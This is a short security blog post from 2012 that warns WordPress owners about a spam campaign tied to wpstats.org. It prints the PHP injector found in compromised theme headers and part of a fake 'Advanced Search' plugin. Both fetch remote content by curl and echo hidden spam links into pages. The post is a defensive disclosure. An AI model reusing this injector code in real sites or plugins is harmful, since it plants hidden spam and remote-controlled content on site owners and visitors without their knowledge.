The Latest in IT Security

Wpstats. org Spam and a Fake Advanced Search Plugin

09
May
2012

If you are seeing hidden links in your WordPress site, it could be coming from wpstats.org. On some blackhat spam cases we are analysing, the following code was added to the theme header of the compromised site:

if(function_exists(‘curl_init’)) { $url = "http://www.wpstats.org/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 5; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo "$data”; }

If you are not familiar with PHP, this code will contact www.wpstats.org/jquery-1.6.3.min.js, which will return a long list of hidden links to be included on your site (not visible on a normal browser).

The plugin

What is more interesting is that they also have a fake plugin called “advanced-search-plugin” that includes those hidden links and a call back to wpstats.org. The plugin does nothing of what is advertised (advanced search), and is just being used to attract attention to get it installed.

Part of the plugin:

/*
Plugin Name: Advanced Search
Plugin URI: http://searchpluginwp.blogspot.com/
Description: Add a Google style search to your blog where suggestions are made for tags, categories and titles.
Author: Jessica devon
Version: 2.1.2
Author URI: http://searchpluginwp.blogspot.com/

*/
if (!function_exists(‘insert_jquery_theme’)){function insert_jquery_theme(){if (function_exists(‘curl_init’)){$url = "http://www.wpstats.org/jquery-1.6.3.min.js";$ch = curl_init();
$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$data = curl_exec($ch);curl_close($ch);echo $data;}}
add_action(‘wp_head’, ‘insert_jquery_theme’);}

If you have this plugin installed, delete it ASAP! Sucuri SiteCheck should be able to identify those hidden spam links if your site is compromised.

Leave a reply


Categories

THURSDAY, NOVEMBER 14, 2019
WHITE PAPERS

Mission-Critical Broadband – Why Governments Should Partner with Commercial Operators:
Many governments embrace mobile network operator (MNO) networks as ...

ARA at Scale: How to Choose a Solution That Grows With Your Needs:
Application release automation (ARA) tools enable best practices in...

The Multi-Model Database:
Part of the “new normal” where data and cloud applications are ...

Featured

Archives

Latest Comments